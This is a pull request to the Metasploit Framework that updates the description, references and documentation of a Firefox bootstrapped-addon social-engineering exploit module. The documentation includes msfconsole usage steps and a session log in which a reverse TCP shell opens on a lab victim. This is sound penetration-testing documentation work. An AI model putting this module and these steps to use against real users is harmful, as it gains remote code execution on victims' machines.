### PR TITLE
firefox_xpi_bootstrapped_addon: Add notes, description, references, docs

### DIFF
--- a/documentation/modules/exploit/multi/browser/firefox_xpi_bootstrapped_addon.md
+++ b/documentation/modules/exploit/multi/browser/firefox_xpi_bootstrapped_addon.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+Mozilla Firefox before version 41 allowed users to install
+unsigned browser extensions from arbitrary web servers.
+
+This module dynamically creates an unsigned .xpi addon file.
+The resulting bootstrapped Firefox addon is presented to
+the victim via a web page. The victim's Firefox browser
+will pop a dialog asking if they trust the addon.
+
+Once the user clicks "install", the addon is installed and
+executes the payload with full user permissions. As of Firefox
+4, this will work without a restart as the addon is marked to
+be "bootstrapped". As the addon will execute the payload after
+each Firefox restart, an option can be given to automatically
+uninstall the addon once the payload has been executed.
+
+As of Firefox 41, unsigned extensions can still be installed
+on Firefox Nightly, Unbranded and Development builds when
+configured with `xpinstall.signatures.required` set to `false`.
+
+Note: this module generates legacy extensions which are
+supported only in Firefox before version 57.
+
+
+### Installation
+
+Download an old Developer Edition (version 4 < 57) installer from:
+
+* https://download-origin.cdn.mozilla.net/pub/devedition/releases/
+
+Browse to `about:config` and set `xpinstall.signatures.required` to `false`.
+
+Open Tools -> Options, search for "updates" and select "Never check for updates".
+
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. Do: `use exploit/multi/browser/firefox_xpi_bootstrapped_addon`
+1. Do: `set SRVHOST [IP]`
+1. Do: `run`
+
+## Options
+
+
+## Scenarios
+
+### Firefox Developer Edition 56.0b9 on Windows 7 SP1 (x64) with xpinstall.signatures.required disabled
+
+Run the module and load the web server URL in Firefox. Install the extension when prompted.
+
+```
+msf6 post(windows/gather/enum_domains) > use exploit/multi/browser/firefox_xpi_bootstrapped_addon 
+[*] No payload configured, defaulting to generic/shell_reverse_tcp
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > run
+[*] Exploit running as background job 1.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/Oj8qCs
+[*] Server started.
+msf6 exploit(multi/browser/firefox_xpi_bootstrapped_addon) > 
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Redirecting request.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending HTML response.
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] 192.168.200.190  firefox_xpi_bootstrapped_addon - Sending xpi and waiting for user to click 'accept'...
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.190:49861) at 2022-09-04 01:46:40 -0400
+```

--- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
+++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb
@@ -15,7 +15,10 @@ class MetasploitModule < Msf::Exploit::Remote
     super( update_info( info,
       'Name'          => 'Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution',
       'Description'   => %q{
-          This exploit dynamically creates a .xpi addon file.
+        Mozilla Firefox before version 41 allowed users to install
+        unsigned browser extensions from arbitrary web servers.
+
+        This module dynamically creates an unsigned .xpi addon file.
         The resulting bootstrapped Firefox addon is presented to
         the victim via a web page. The victim's Firefox browser
         will pop a dialog asking if they trust the addon.
@@ -26,15 +29,29 @@ class MetasploitModule < Msf::Exploit::Remote
         be "bootstrapped". As the addon will execute the payload after
         each Firefox restart, an option can be given to automatically
         uninstall the addon once the payload has been executed.
+
+        As of Firefox 41, unsigned extensions can still be installed
+        on Firefox Nightly, Unbranded and Development builds when
+        configured with `xpinstall.signatures.required` set to `false`.
+
+        Note: this module generates legacy extensions which are
+        supported only in Firefox before version 57.
       },
       'License'       => MSF_LICENSE,
       'Author'        => [ 'mihi', 'joev' ],
-      'References'    =>
-        [
-          [ 'URL', 'https://developer.mozilla.org/en/Extensions/Bootstrapped_extensions' ],
-          [ 'URL', 'http://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
-        ],
-      'DisclosureDate' => '2007-06-27'
+      'DisclosureDate' => '2007-06-27',
+      'References'    => [
+        [ 'URL', 'https://blog.mozilla.org/addons/2015/02/10/extension-signing-safer-experience/' ],
+        [ 'URL', 'https://blog.mozilla.org/addons/2015/04/15/the-case-for-extension-signing/' ],
+        [ 'URL', 'https://support.mozilla.org/en-US/kb/frequently-asked-questions-firefox-addon' ],
+        [ 'URL', 'https://web.archive.org/web/20170727035940/https://developer.mozilla.org/en-US/Add-ons/Bootstrapped_extensions' ],
+        [ 'URL', 'https://web.archive.org/web/20160322014439/https://dvlabs.tippingpoint.com/blog/2007/06/27/xpi-the-next-malware-vector' ]
+      ],
+      'Notes' => {
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
+        'Stability' => [CRASH_SAFE]
+      }
     ))
   end
 


### PR DESCRIPTION
Part of #16799.

The `firefox_xpi_bootstrapped_addon` module was written in a time when Firefox extensions could be installed from anywhere and did not need to be signed. The description is open ended, implying this never changed. This is confusing for users, as modern Firefox (2017+) simply states that the extension is "corrupt" when attempting installation, offering no reason as to why installation failed.

This PR updates the description (and module meta info and documentation) to clearly describe the Firefox versions and builds which this module is expected to target successfully. This is in line with phrasing used in existing modules ("This module exploits a vulnerability in ABC software versions prior to 123 ...").
